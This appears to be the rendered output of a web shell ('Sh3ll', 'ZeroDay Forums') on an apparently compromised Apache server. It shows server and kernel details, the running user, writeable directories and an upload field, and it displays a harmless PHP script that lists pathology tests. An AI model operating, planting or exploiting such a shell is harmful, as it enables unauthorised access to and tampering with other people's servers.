Sh3ll
OdayForums


Server : Apache
System : Linux profile 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 8.0.28
Disable Function : NONE
Directory :  /var/www/html/mmishra/icure/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/mmishra/icure/phtests.inc
<h3 align='left'>Pathology Tests</h3>

<?php

$tbl = 'phtests';

$rs = mysql_query("select test_group,test_name,test_range from $tbl order by test_group,test_name");
if (mysql_num_rows($rs)) {
        $colHeads = mysql_num_fields($rs);

        echo "<table border='1' width='90%' align='center'><tr><th>Sr</th>";
        for ($i=0; $i < $colHeads; $i++) { // Header
                echo "<th>".ucwords(str_replace("_"," ",mysql_field_name($rs, $i)))."</th>";
        }
        echo "</tr>";
                
	$no++;
        while ($row = mysql_fetch_row($rs)) { //data
                $j++;
                if ($j % 2 == 0)
                        echo "<tr bgcolor='lightpink'><td>$j</td><td>".implode($row,'</td><td>')."</td></tr>";
                else
                        echo "<tr><td>$j</td><td>".implode($row,'</td><td>')."</td></tr>\n";
        }
        echo "</table>";
} else {
        echo "---";
}

?>

ZeroDay Forums Mini